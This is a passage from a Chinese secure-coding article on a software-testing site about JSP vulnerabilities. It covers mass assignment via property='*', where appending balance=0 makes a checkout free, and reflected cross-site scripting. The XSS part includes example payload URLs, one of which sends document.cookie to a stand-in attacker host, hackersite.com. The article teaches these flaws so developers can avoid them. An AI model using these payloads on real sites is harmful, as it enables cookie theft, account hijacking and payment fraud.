• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

JSP安全编程实例浅析

发布: 2009-6-10 09:57 | 作者: 不详 | 来源: 测试时代采编 | 查看: 59次 | 进入软件测试论坛讨论

领测软件测试网

注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是
直接通过Query String提交的全部变量的值,将存储到匹配的bean属性中。 

  一般,用户是这样提交请求的: 

http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342  

  但是不守规矩的用户呢?他们可能会提交: 

http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342&balance=0  


  这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击
“chekout”结账的时候,费用就全免了。 

  这与PHP中全局变量导致的安全问题如出一辙。
由此可见:“property="*"”一定要慎用!

三、长盛不衰的跨站脚本 

  跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中
手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此
页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多
数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成
严重的威胁。 

  以仿动网的阿菜论坛(beta-1)举个最简单的例子。当我们提交 

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser
<;script>alert(document.cookie)</script>  

  便能弹出包含自己cookie信息的对话框。而提交 

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser
<;script>document.location='http://www.163.com'</script>  

  就能重定向到网易。 

  由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过
滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代
码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接: 

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie</script>  

  xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也
就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技
术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来
就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。 

  对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨
站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会
对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,
比如下面的代码就把危险的字符进行替换: 

文章来源于领测软件测试网 https://www.ltesting.net/

42/4<1234>

关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备2023014753号-2
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网